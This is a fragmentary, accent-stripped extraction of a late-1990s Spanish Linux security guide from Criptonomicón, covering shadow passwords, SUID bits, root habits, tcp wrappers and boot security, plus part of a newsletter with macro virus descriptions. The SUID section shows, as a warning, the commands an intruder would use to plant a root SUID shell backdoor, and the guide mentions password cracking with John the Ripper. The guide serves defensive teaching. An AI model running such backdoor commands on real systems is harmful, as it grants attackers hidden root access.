Seguridad de Red
Recursos
Introduccin
Cuentas de usuario,
grupos
Seguridad de las
claves
El bit SUID/SGID
Seguridad del root
Para comprobar que este requisito se verifica en nuestro sistema, podemos usar los
mismos mecanismos que utilizan los atacantes. Existen varios programas que van
probando varias palabras de diccionario, claves habituales y combinaciones de
caracteres, que son cifrados con el mismo algoritmo que usa el sistema para mantener
sus claves; despus son comparadas con el valor de la clave cifrada que quermos
averiguar hasta que el valor obtenido de un cifrado coincide con una clave cifrada.
Posteriormente notificaremos al usuario que su clave es dbil y le solicitaremos que
la modifique.
Usando este mecanismo, al menos podemos garantizar que no estaremos en
inferioridad de condiciones con respecto a los atacantes locales.
Un conocido programa para realizar el descifrado de claves es John the Ripper.
Por otro lado, las claves cifradas se almacenan en el fichero /etc/passwd.
Cualquier usuario del sistema tiene permiso de lectura sobre este fichero. Lo que es
peor, agujeros en los navegadores permiten que se puedan leer ficheros arbitrarios de
una mquina (evidentemente, que el usuario de navegador tenga permiso para leer),
de manera que lleguen hasta un hacker que cree pginas web que exploten estos
agujeros. No te pierdas una demostracin para Netscape 4.5. Entonces puede parecer
a primera vista que nos encontramos con un grave agujero de seguridad. El atacante,
una vez obtenido el fichero /etc/passwd no tiene ms que ejecutar su programa
revientaclaves favorito y sentarse a esperar hasta que empiecen a aparecer nombres
de usuario con sus respectivas contraseas, algo que suele pasar muy rpidamente.
Con suerte, si el administrador es ingenuo o dejado, incluso dar con la clave del
root, abrindosele as las puertas a la mquina objetivo. Para solucionar esta
vulnerabilidad, podemos recurrir a contraseas en la sombra (shadow passwords), un
mecanismo consistente en extraer las claves cifradas del fichero /etc/passwd y
situarlas en otro fichero llamado /etc/shadow, que slo puede leer el root y dejar
el resto de la informacin en el original /etc/passwd. El fichero /etc/shadow
slo contiene el nombre de usuario y su clave, e informacin administrativa, como
cundo expira la cuenta, etc. El formato del fichero /etc/shadow es similar al
siguiente:
usuario : clave : ultimo : puede : debe : aviso : expira
: desactiva : reservado
99999 : 7 : -1 : -1
la pantalla). En alguna situacin olvidar una clave puede ser un serio problema.
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
El bit SUID/SGID
Archivos
Seguridad de Red
Seguridad
Qu hacer en caso de
Introduccin
Cuentas de usuario,
grupos
Seguridad de las claves
El bit SUID/SGID
Seguridad del root
ls -la /usr/bin/passw*
Ruptura?
Recursos
Esto quiere decir que cuando se ejecute, el proceso correspondiente va a tener los
privilegios del propietario del comando (es decir, el root), no del usuario que lo
lanz. En otras palabras, el proceso generado por passwd pertenece a root. A
primera vista, esto puede parecer una seria brecha de seguridad. Y lo es. Si el
programa funciona correctamente, no tiene por qu dar problemas; pero pequeos
defectos en el programa pueden ser utilizados por alguien para tratar de ejecutar otro
cdigo distinto con los privilegios de este proceso. El mtodo suele ser el
desbordamiento de la pila (buffer overflow).
Cualquier atacante que haya entrado en un sistema de forma ilegtima intentar dejar
una shell con el bit SUID para mantener ese nivel de privilegio cuando vuelva a
entrar en el sistema.
SGID es lo mismo que SUID, pero aplicado al grupo.
As pues, tenga cuidado con los programas con el bit SUID/SGIG. Puede
encontrarlos con
root# find / -type f \( -perm -04000 -o -perm -02000 \)
-print
Tenga en cuenta que algunos programas (como passwd) tienen que tener el bit
SUID. Compruebe en los lugares habituales, (que indicamos en la seccin
correspondiente) que ninguno de los programas propiedad del root o SUID que
utiliza en su sistema, tiene un fallo de seguridad conocido que pueda ser explotado.
Nunca debe permitir que quede una shell SUID corriendo en el sistema. Si el root
deja desatendida la consola durante unos instantes (recuerde, debe utilizar siempre
xlock), un intruso podra escribir lo siguiente:
# cp /bin/sh /tmp/cuenta-root
# chmod 4755 /tmp/cuenta-root
crendose una versin SUID de la shell sh. En el futuro, cuando el atacante ejecute
ese programa, cuenta-root, se convertir en root! Si lo escondiera en un
directorio oculto, la nica forma de encontrarlo sera escaneando el sistema completo
como se ha explicado antes.
Y recuerde, nuca escriba guiones de shell SUID.
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Recursos
Hay herramientas como sudo que permiten a ciertos usuarios utilizar comandos
privilegiados sin necesidad de ser root, como montar o desmontar dispositivos.
Adems registra las actividades que se realizan, lo que ayuda a determinar qu hace
realmente este usuario.
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Recursos
Hbitos seguros
La seguridad del administrador es simple, en mayor medida
consiste en tener unos hbitos seguros y tambin en utilizar
herramientas seguras.
Introduccin
Hbitos seguros
Consejos
Una primera norma que siempre debera tener presente es usar la
cuenta de root slo para realizar tareas concretas y breves y el resto hacerlo como
usuario normal. Es una costumbre muy peligrosa usar todo el tiempo la cuenta de
root. Al principio, a los usuarios de Linux les gusta sentir todo el poder de la cuenta
de root, les molesta que su propio sistema les deniegue el permiso para hacer algo,
pero van cambiando de opinin poco a poco, conforme se van familiarizando con el
sistema o cuando han realizado un destrozo de esos que nos hacen proferir insultos
contra nosotros mismos acompaados de un desesperado puetazo en la mesa (o en
el teclado). Piense que cuando el sistema le deniega alguna operacin es porque
puede conllevar algn riesgo. El sistema le avisa para que piense dos veces lo que
est haciendo.
En los casos de tareas que necesiten privilegios de administrador para realizar una
operacin concreta, podemos usar la orden su (Super Usuario) o tambin sudo.
De esta forma podremos acceder a los privilegios de root slo cuando nos interese.
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Consejos
Seguridad de Red
Ruptura?
Recursos
Introduccin
Asegrese de que en los borrados de ficheros por parte del
root se pide confirmacin. Esto lo puede hacer poniendo
Hbitos seguros
alias rm="rm -i". Esto es lo habitual para el root. Si en
alguna ocasin tiene que borrar muchos ficheros y no quiere
Consejos
confirmar cada uno de ellos, puede usar la opcin -f para
no pedir confirmacin, deshacer el alias con alias rm=rm o bien usando la
orden yes, poniendo yes|rm ficheros para ir confirmando automticamente
cada una de las preguntas de la orden.
Procure prever los resultados de una orden, sobre todo si usa comodines,
intentndolo antes una forma no irreversible. Por ejemplo, si quiere borrar
todos los ficheros terminados en ~ ejecute primero ls -la *~ y una vez que
haya verificado a qu va a afectar la orden, ejecute rm *~.
Vigile la variable de entorno PATH. Limite la bsqueda automtica de
ejecutables a las ubicaciones estndar del sistema. De forma particular evite
incluir el directorio actual, es decir ., en esta bsqueda. Bastara incluir un
ejecutable llamado ls en un directorio para que usted mismo ejecute un
cdigo desconocido con privilegios de root, y cuando se d cuenta de lo que ha
hecho sea demasiado tarde.
ssh en lugar de telnet u otra herramienta que no cifre los datos de las
conexiones. Los servicios remotos como rlogin, rsh y rexec, como
dijimos antes, no suelen ser seguros si se utilizan canales no seguros. Es mejor
deshabilitarlos.
Limite las ubicaciones desde donde alguien se puede conectar como root al
sistema. En el fichero /etc/securetty puede especificar la lista de terminales
desde las cuales se puede conectar el root. Las teminales predeterminadas para
conectarse como root slo incluyen las consolas virtuales (vtys). Si tuviera que
conectarse como root desde una ubicacin distinta a la consola, hgalo como
usuario normal primero y luego utilice su para acceder a los privilegios de
root. De esta forma un posible atacante tendra que conocer el nombre de un
usuario del sistema, conocer su clave y tambin conocer la clave del root. Esto
pone ms dificultades para obtener privilegios remotos en su sistema.
Evite siempre dar la clave de root, no lo haga bajo ningn concepto por mucha
confianza que tenga con esa persona. Si tiene que otorgar privilegios a algn
usuario para realizar alguna tarea de administracin, como montar un CD u
otro dispositivo similar, utilice sudo para permitirlo con la propia clave del
usuario. As puede decidir qu usuario tiene acceso a una determinada orden.
No modifique los permisos de un fichero o directorio si no sabe realmente qu
est haciendo. Los valores que trae la instalacin de las distintas distribuciones
suelen ser adecuados.
Jams, insistimos, jams se conecte a un servicio IRC como usuario root.
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
inetd
Para atender las solicitudes de conexin que llegan a nuestro
equipo existe un demonio llamado inetd que est a la escucha de
todos los intentos de conexin que se realicen a su mquina.
Cuando le llega una solicitud de conexin ir dirigida a un puerto
(nmero de servicio, quizs sea ms claro que puerto), por
ejemplo, el 80 sera una solicitud al servidor de pginas web, 23
para telnet, 25 para smtp, etc. Los servicios de red que presta su
mquina estn descritos en /etc/inetd.conf (y en
/etc/services los nmeros de puertos). Por ejemplo, en
/etc/inetd.conf podemos encontrar las siguientes lneas:
Introduccin
inetd
tcp wrapper
Incidencias
Comunicaciones
seguras
Consejos finales
(...)
pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d
# imap stream tcp nowait root /usr/sbin/tcpd imapd
(...)
Ruptura?
Recursos
Esto quiere decir que, cuando llegue una solicitud de conexin al puerto 110 (pop3)
se ejecutar el programa /usr/sbin/tcpd ipop3d. Sin embargo, el servicio
imap est deshabilitado (est comentado con un # delante), por lo que el sistema no
le responde.
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Recursos
TCP Wrapper
El siguiente paso es /usr/sbin/tcpd, que es el tcp_wrapper:
un servicio que verifica el origen de las conexiones con su base de
datos /etc/hosts.allow (equipos autorizados) y
/etc/hosts.deny (equipos a los que se les deniega la
conexin). tcpd anota todos los intentos de conexin que le llegan
en /var/log/secure para que tenga la posibilidad de saber
quin intenta conectarse a su mquina y si lo consigue. Si tcpd
autoriza la conexin, ejecuta ipop3d que es el programa que
realmente atiende la conexin, ante el cual se tiene que validar el
usuario mediante una clave. Observe que ya llevamos tres niveles
de seguridad: prestar un servicio, autorizar un conexin y validar
un usuario.
Introduccin
inetd
tcp wrapper
Incidencias
Comunicaciones
seguras
Consejos finales
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Introduccin
inetd
tcp wrapper
Incidencias
Comunicaciones
seguras
Consejos finales
Seguridad
Trabajando en modo texto se puede hacer en una consola virtual (como root)
Qu hacer en caso de
Ruptura?
tail -f /var/log/messages
y
Recursos
tail -f /var/log/secure
y de esta forma podemos ir viendo las incidencias del sistema. Conviene tambin
familiarizarse con las anotaciones que aparecen habitualmente para diferenciarlas de
las que puedan presentar un problema.
En modo grfico hay un programa llamado ktail que le muestra las incidencias de
una forma similar a la anterior.
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Recursos
Comunicaciones seguras
Por ltimo, nos interesar mantener unas comunicaciones seguras
para garantizar la privacidad e integridad de la informacin.
Actualmente existen las herramientas necesarias para cada
necesidad.
Podemos usar cifrados simtricos como pgp y gpg para
documentos, correo electrnico y comunicaciones sobre canales
inseguros
Introduccin
inetd
tcp wrapper
Incidencias
Comunicaciones
seguras
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Consejos finales
Limite las acciones que realice como root al mnimo
imprescindible, y sobre todo no ejecute programas desconocidos.
Por ejemplo, en un juego (el quake) que distribua una revista
haba un programa llamado runme que enviaba por mail las
caractersticas de la mquina a una direccin de correo. En este
caso se trataba de un troyano inofensivo, pero ofrece una idea de
lo que puede hacer un programa ejecutado sin saberse lo que hace.
Linux tambin tiene la posibilidad de proporcionar acceso
transparente a Internet a una red local mediante IP masquerade.
En este caso, si usamos direcciones de red privadas, nos
aseguramos que los equipos de la red interna no son accesibles
desde Internet si no es a travs del equipo Linux.
Introduccin
inetd
tcp wrapper
Incidencias
Comunicaciones
seguras
Consejos finales
Tambin podemos instalar un servidor proxy con cach, que a la vez que acta de
filtro de conexiones a nivel de aplicacin, puede acelerar el acceso a servicios desde
la red local.
Recursos
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Introduccin
Opciones de
compilacin
Seguridad de Red
Recursos
memoria.
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Introduccin
Opciones de
compilacin
Dispositivos del
ncleo
Qu hacer en caso de
Ruptura?
Recursos
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Seguridad en el arranque
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Recursos
Seguridad en el arranque
Cuando alguien inicia el sistema operativo Linux se encuentra con
una pantalla de login: el sistema est pidiendo que se identifique.
Si es un usuario conocido, podr iniciar una sesin y trabajar con
el sistema. Si no lo es, no tendr opcin de hacer absolutamente
nada. Adems, el sistema registra todos los intentos de acceso
(fallidos o no), por lo que no pasarn desapercibidos intentos
repetidos de acceso no autorizado.
Seguridad fsica
Seguridad en el
arranque
Bloqueo de la consola
Seguridad en el arranque
# dd if=/boot/vmlinuz of=/dev/fd0
# rdev /dev/fd0 /dev/hdXY
Suponiendo que estemos usando un disco duro IDE, X indica el disco (a,b,c, o
d), Y indica la particin (1,2,...).
Si tiene ms de un sistema operativo en su mquina, le puede interesar hacer
una copia de salvaguardia del MBR:
# dd if=/dev/hda of=/boot/arranque.mbr count=1
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Recursos
Bloqueo de la consola
En los entornos Unix es conocido el truco de ejecutar en una
teminal, que alguien ha dejado inocentemente abierto, un guion
que simule la pantalla de presentacin al sistema. Entonces un
usuario incauto introudcir su nombre y clave, que quedarn a
merced del autor del engao.
Seguridad fsica
Seguridad en el
arranque
Bloqueo de la consola
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Recursos
Por qu la Seguridad
Qu significa
Seguro?
"Poltica de Seguridad" que fije el nivel de seguridad que requiere ese sitio y que
sistema de comprobacin se realiza. Puede encontrar un ejemplo muy conocido de
poltica de seguridad en el RFC 2196.
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Por qu la Seguridad
Qu significa Seguro?
Seguridad en el
desarrollo de Linux
Servicios en Linux
Qu Quiere Proteger?
Qu hacer en caso de
Ruptura?
Recursos
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Servicios en Linux
Linux tiene disponible todos los servicios habituales en una red:
Bases de datos.
Servicios de internet.
Servicio de ficheros e impresin.
Utilidades necesarias para mantener el nivel de seguridad
requerido.
Seguridad
Qu hacer en caso de
Ruptura?
Recursos
Por qu la Seguridad
Qu significa Seguro?
Seguridad en el
desarrollo de Linux
Servicios en Linux
Pero adems hay que resear que cada servicio funciona sin
Qu Quiere Proteger?
afectar al resto de los servicios. Vd. puede modificar la direccin
IP de su equipo, las rutas, aadir, parar o reiniciar un servicio
concreto sin que el resto de los servicios se vean afectados. Slo es necesario detener
el equipo para realizar operaciones con el hardware, como aadir un disco duro, o
utilizar un nuevo ncleo. No tendr, pues, la necesidad de tener que ser Vd. mismo el
atacante de su propio sistema, a diferencia de lo que ocurre en otros sistemas
operativos.
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Recursos
Qu Quiere Proteger?
Por qu la Seguridad
Normalmente querr garantizar que el sistema permanece en
funcionamiento de forma adecuada. Querr garantizar que nadie
Qu significa Seguro?
pueda obtener o modificar una informacin a la que no tiene
derecho legtimo. Y tambien querr garantizar unas
Seguridad en el
comunicaciones seguras. Una buena planificacin ayuda bastante
desarrollo de Linux
a conseguir los niveles de seguridad que pretendemos. Antes de
intentar asegurar su sistema debera determinar contra qu nivel
Servicios en Linux
de amenaza quiere protegerse, qu riesgo acepta o no y, como
resultado, cmo de vulnerable es su sistema. Debera analizar su Qu Quiere Proteger?
sistema para saber qu est protegiendo, por qu lo est
protegiendo, qu valor tiene y quines tienen responsabilidad
sobre sus datos y otros elementos.
Riesgo es la posibilidad de que un intruso pueda intentar acceder con xito a
su equipo. Puede un intruso leer y escribir en ficheros o ejecutar programas
que puedan causar dao?Pueden borrar datos crticos? Prevenir a su
compaa de la prdida de un trabajo importante realizado? Recuerde tambin
que alguien que obtenga acceso a su cuenta, o su sistema, tambin puede
hacerse pasar por Vd.
Adems, bata tener una sola cuenta insegura en su sistema para comprometer
toda su red. Un simple usuario al que se le permita presentarse al sistema
usando un fichero rhost, o permitir el uso de un servicio inseguro como tftp,
origina el riesgo de que los intrusos puedan usarlo para "meter un puerta". Una
vez que el intruso tiene una cuenta de usuario en su sistema, o en el sistema de
cualquier otro, puede usarla para conseguir acceso a otros sistemas o a otras
cuentas.
La amenaza proviene de alguien que tiene motivos para obtener acceso sin
autorizacin a su red o equipo. Debe decidir en quin confa para dotar de
acceso a su sistema y qu amenaza puede representar.
Las amenazas proceden de varios tipos de intrusos, y es til tener en mente sus
diferentes caractersticas cuando est asegurando sus sistemas.
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt
******************************************
Susurros desde la cripta
******************************************
1. Las guerras de los MP3
Acabar el formato MP3 y la distribucin de msica a travs de
Internet con la industria discogrfica? Para muchos la respuesta es
un contundente y rotundo S. La nica duda resta en saber exactamente
en cunto tiempo.
Esta industria multimillonaria se ha caracterizado por aplastar todas
las tecnologas que potencialmente podan amenazar sus vastos
intereses econmicos. Primero destruy el formato DAT y cuando MP3 se
extenda peligrosamente, su reaccin no se hizo esperar: en cuanto
Diamond (www.diamond.com) lanz al mercado su controvertido
reproductor Rio, la RIAA (Asociacin Americana de la Industria
Discogrfica), que representa a los principales sellos discogrficos
del mundo, llev a la compaa a los tribunales alegando que la venta
de Rio alentara la piratera. El veredicto final, emitido en junio
de 1999, declar que Rio no violaba ninguna ley ni la AHRA (Audio
Home Recording Act), en la medida en que el reproductor copia las
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt
- - Nombre: WM97/Marker-BX
- - Variantes: WM97/Marker-CX
- - Tipo: Virus de macros de Word 97
Virus reportado activo. Si la fecha actual es posterior a junio de
1999, el virus intenta crear mltiples copias de s mismo en la
carpeta C:\Windows. Estas copias son nombradas AAxAA.DOC, donde "x"
es un nmero de 1 a 999999991. El primer documento se llamar
AA1AA.DOC y continuar hasta crear el AA999999991AA.DOC, o hasta que
se acabe el espacio libre en el disco.
-
--Nombre: Irok-10000
Seudnimos: VBS/Irok, VBS/Irok.Trojan,
Tipo: Ejecutable y virus de mIRC
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt
http://www.iec.csic.es/criptonomicon/suscripcion.html
******************************************
11. Nmeros atrasados
Podis encontrar los nmeros atrasados del boletn en:
http://www.iec.csic.es/criptonomicon/suscripcion.html
Se pueden recuperar todos en formato ZIP o de uno en uno.
******************************************
12. Firma PGP
Se puede obtener la clave pblica PGP del Criptonomicn en:
http://www.iec.csic.es/criptonomicon/criptonomicon.txt
Para ms informacin sobre qu es el correo seguro y cmo funciona
PGP, se puede visitar:
http://www.iec.csic.es/criptonomicon/correo/
******************************************
(C) Copyright 2000 Criptonomicn
http://www.iec.csic.es/criptonomicon
Un servicio ofrecido libremente desde el Instituto de Fsica Aplicada
del CSIC por Gonzalo lvarez Maran
email: criptonomicon@iec.csic.es
Todos los trabajos, artculos, comentarios u opiniones de los
colaboradores de Criptonomicn son de su exclusiva responsabilidad,
siendo ellos los que responden de la veracidad y exactitud de sus
aportaciones. Criptonomicn agradece las mencionadas colaboraciones,
pero no comparte necesariamente las opiniones manifestadas. Asimismo,
es responsabilidad del lector descargar, instalar y ejecutar en su
propio sistema los programas que se mencionen en el Criptonomicn.
-----BEGIN PGP SIGNATURE----Version: PGPfreeware 6.5.1 for non-commercial use <http://www.pgp.com>
iQA/AwUBOOyoyYUNKyrTCJjtEQLllwCgjDt3DEtysl6pPyiR2mcNO+dW7JoAoL5B
g9kzqkWDzYfm6/mmAZZTGO/0
=GYKR
-----END PGP SIGNATURE-----